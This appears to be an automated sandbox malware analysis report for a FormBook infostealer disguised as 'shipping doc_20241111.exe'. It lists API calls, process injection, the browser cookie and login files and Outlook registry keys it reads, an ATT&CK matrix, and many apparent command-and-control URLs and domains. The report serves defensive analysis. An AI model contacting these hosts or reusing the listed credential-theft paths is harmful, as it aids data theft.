Code function: 0_2_00F4445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F4445D

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00F5EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,

0_2_00F5EFAD

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FAE2D7 mouse_event,

0_2_00FAE2D7

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping doc_20241111.exe"	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

0_2_00FA0AA6

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FA15A7 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00FA15A7

Source: shipping doc_20241111.exe	Binary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd%s#comments-end#ceCALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEG
Source: shipping doc_20241111.exe, DvhYoKnukykMD.exe, 00000002.00000002.4108870459.0000000001060000.00000002.00000001.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000000.1688340860.0000000001060000.00000002.00000001.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000000.1844816884.0000000001A41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: DvhYoKnukykMD.exe, 00000002.00000002.4108870459.0000000001060000.00000002.00000001.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000000.1688340860.0000000001060000.00000002.00000001.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000000.1844816884.0000000001A41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: DvhYoKnukykMD.exe, 00000002.00000002.4108870459.0000000001060000.00000002.00000001.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000000.1688340860.0000000001060000.00000002.00000001.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000000.1844816884.0000000001A41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: DvhYoKnukykMD.exe, 00000002.00000002.4108870459.0000000001060000.00000002.00000001.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000000.1688340860.0000000001060000.00000002.00000001.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000000.1844816884.0000000001A41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00F60618 cpuid

0_2_00F60618

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FB80B3 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00FB80B3

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00F9DA16 GetUserNameW,

0_2_00F9DA16

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00F7BB0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00F7BB0F

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00F4615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F4615E

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.2540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.2540000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4109217815.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4108005033.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4109259542.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765791231.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765495774.0000000002FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4109168636.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765284786.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4110795984.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\AtBroker.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: shipping doc_20241111.exe	Binary or memory string: WIN_81
Source: shipping doc_20241111.exe	Binary or memory string: WIN_XP
Source: shipping doc_20241111.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: shipping doc_20241111.exe	Binary or memory string: WIN_XPe
Source: shipping doc_20241111.exe	Binary or memory string: WIN_VISTA
Source: shipping doc_20241111.exe	Binary or memory string: WIN_7
Source: shipping doc_20241111.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.2540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.2540000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4109217815.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4108005033.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4109259542.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765791231.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765495774.0000000002FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4109168636.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765284786.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4110795984.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FC112B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00FC112B
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FC172D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00FC172D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
shipping doc_20241111.exe	50%	ReversingLabs	Win32.Trojan.Autoitinject
shipping doc_20241111.exe	36%	Virustotal		Browse
shipping doc_20241111.exe	100%	Avira	DR/AutoIt.Gen8
shipping doc_20241111.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
loginov.enterprises	0%	Virustotal	Browse
wcp95.top	2%	Virustotal	Browse
iuyi542.xyz	3%	Virustotal	Browse
neg21.top	3%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/02/202310021539053089.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111418363409.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111308331250.jpg	0%	Avira URL Cloud	safe
http://www.kghjkx.xyz/usop/?Ir8HUj=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&gRU0e=jXFT04FhvBZ8j0BP	0%	Avira URL Cloud	safe
http://www.loginov.enterprises/y0sc/?Ir8HUj=tJdq8Dqw4hWr1P6qEs9XA9ulKGeCKOZ69MCgVLcAx6ZVjDjmpjdFTuG7zOk3Xzu/3Z3aFvoU5EatdrO56B9xfE0dTwpHmj+n2Md29oHJdKs4Wl1g5NQAF3s=&gRU0e=jXFT04FhvBZ8j0BP	0%	Avira URL Cloud	safe
http://www.energyparks.net/k47i/	0%	Avira URL Cloud	safe
http://www.primeproperty.property/c1ti/	0%	Avira URL Cloud	safe
http://www.hasthosting.xyz/04fb/?Ir8HUj=EDSq5eKeQ/yn	0%	Avira URL Cloud	safe
http://www.hasthosting.xyz/04fb/	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121012371226.jpg	0%	Avira URL Cloud	safe
http://www.flikka.site/brrb/?Ir8HUj=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&gRU0e=jXFT04FhvBZ8j0BP	0%	Avira URL Cloud	safe
http://www.primeproperty.property/c1ti/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs=	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111730363919.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.js	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/15/202310151543577674.gif	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111414394270.jpg	0%	Avira URL Cloud	safe
http://www.neg21.top/1i1f/	0%	Avira URL Cloud	safe
http://www.ladylawher.shop/i4bc/	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281739019902.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111336168422.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111650528174.jpg	0%	Avira URL Cloud	safe
https://www.kghjkx.xyz/usop/?Ir8HUj=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJ	0%	Avira URL Cloud	safe
http://www.digitaladpro.shop/m6se/?Ir8HUj=tpLSjTwEMN9ZKyp9qReDGLLjNHd3g2FWt49InxX861XvXeuMycl54O2gPUIwqUAFUHZpWTTH+IZzoIJ8zXVpnZ2Md6c4WxN9xCYnLA+vBCEiYAXHGzT4+go=&gRU0e=jXFT04FhvBZ8j0BP	0%	Avira URL Cloud	safe
http://www.energyparks.net/k47i/?Ir8HUj=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&gRU0e=jXFT04FhvBZ8j0BP	0%	Avira URL Cloud	safe
http://www.kghjkx.xyz/usop/	0%	Avira URL Cloud	safe
http://www.hasthosting.xyz	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.js	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281742124338.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.js	0%	Avira URL Cloud	safe
https://00808.vip/	100%	Avira URL Cloud	malware
http://www.wcp95.top/1bs4/?Ir8HUj=NHlL/20Wj3mxTDCCV+M5id+XoFfJt54Wk+fSFhy0eU4XSufIixCpuDbgh6jDD4pzJGK3HRNTU3Jm+E3fIwMaFSslRZAP0ZQrwEek3MA5lFQUr9BJzjrl1NA=&gRU0e=jXFT04FhvBZ8j0BP	0%	Avira URL Cloud	safe
http://www.ladylawher.shop/i4bc/?Ir8HUj=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&gRU0e=jXFT04FhvBZ8j0BP	0%	Avira URL Cloud	safe
http://www.college-help.info/fu91/?Ir8HUj=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&gRU0e=jXFT04FhvBZ8j0BP	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111352290269.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111457131826.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.png	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281551058064.jpg	0%	Avira URL Cloud	safe
http://www.hasthosting.xyz/04fb/?Ir8HUj=EDSq5eKeQ/yn+NstHP+aoJNwtbWo2f2aV0X8lTwCWtszw4+D6CyS4FGQqOFHTxK4f9NdVPPEgKVRXB/uQSDXYOkNzy5V1DgJAKJcxyf5ssQ9BiSUznEU9hA=&gRU0e=jXFT04FhvBZ8j0BP	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121107457674.jpg	0%	Avira URL Cloud	safe
http://www.iuyi542.xyz/cymd/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ=	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111316162395.jpg	0%	Avira URL Cloud	safe
http://www.wcp95.top/1bs4/	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.png	0%	Avira URL Cloud	safe
http://www.iuyi542.xyz/cymd/	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpeg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.png	0%	Avira URL Cloud	safe
http://www.binacamasala.com/usv6/	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121017068870.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281533072611.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpg	0%	Avira URL Cloud	safe
http://www.digitaladpro.shop/m6se/	0%	Avira URL Cloud	safe
http://www.jllllbx.top/s7rc/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=6DRnIJ+Fte42OB/5XahWefuJxFukpBxOvMg5DpP/yyjJNxXWq01mXWJaUM52jX/tQu57he5PJxxVPcJX3Ib35ixrzLdezhzqPCe9qS9F0Axe4HxDKFQRrXU=	0%	Avira URL Cloud	safe
http://www.binacamasala.com/usv6/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.png	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.css	0%	Avira URL Cloud	safe
http://www.college-help.info/fu91/	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png	0%	Avira URL Cloud	safe
http://www.yvrkp.top/9jdk/	0%	Avira URL Cloud	safe
http://www.yvrkp.top/9jdk/?Ir8HUj=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&gRU0e=jXFT04FhvBZ8j0BP	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202309/19/202309191047059862.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121040515603.jpg	0%	Avira URL Cloud	safe
https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=	0%	Avira URL Cloud	safe
